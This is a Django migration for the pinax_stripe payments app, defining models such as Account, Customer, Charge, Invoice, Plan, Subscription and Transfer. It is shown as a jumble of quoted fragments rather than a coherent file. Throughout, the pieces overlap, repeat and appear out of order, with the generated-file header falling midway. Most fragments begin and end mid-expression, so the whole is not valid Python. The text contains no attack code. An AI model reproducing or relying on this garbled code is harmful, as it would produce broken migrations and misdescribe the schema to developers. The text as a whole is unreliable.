('trial_period_days', models.IntegerField(blank=True,", "models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code',", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured',", "null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ],", "False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ],", "null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ],", "models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE,", "# -*- coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06 19:00", "('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ],", "], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False,", "to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False,", "max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)),", "models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'),", "# Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from", "null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type',", "models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)),", "('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')],", "('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10,", "models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True,", "name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user',", "models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency',", "), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)),", "model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'),", "null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False,", "migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once',", "), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True,", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application',", "('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)),", "on 2018-08-06 19:00 from __future__ import unicode_literals from decimal import Decimal from django.conf", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True,", "models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),", "model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status',", "null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ),", "null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100,", "model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)),", "models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source',", "('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)),", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers',", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency',", "models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32,", "models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end',", "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)),", "models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)),", "('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True,", "null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False,", "null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided',", "models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount',", "null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)),", "('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices',", "null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)),", "null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)),", "models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)),", "max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)),", "related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, },", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id',", "models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri',", "), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer',", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id',", "), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True,", "decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()),", "[ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "}, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={", "('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent',", "models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True,", "-*- # Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals", "models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False,", "models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)),", "models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract':", "}, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts',", "import migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration):", "models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True,", "19:00 from __future__ import unicode_literals from decimal import Decimal from django.conf import settings", "max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, },", "null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)),", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)),", "models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)),", "models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)),", "('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True,", "('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField(", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)),", "('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True,", "options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32,", "('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')),", "default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True,", "models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True,", "False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)),", "to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id',", "('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd',", "('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[", "models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()),", "null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number',", "migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()),", "null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number',", "models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={", "models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)),", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True,", "('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True,", "models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)),", "('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True,", "null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True,", "('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[", "models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)),", "jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email',", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)),", "models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2,", "models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True,", "('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)),", "('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)),", "('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2,", "('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True,", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)),", "models.BooleanField(default=False)), ('request', models.CharField(blank=True, 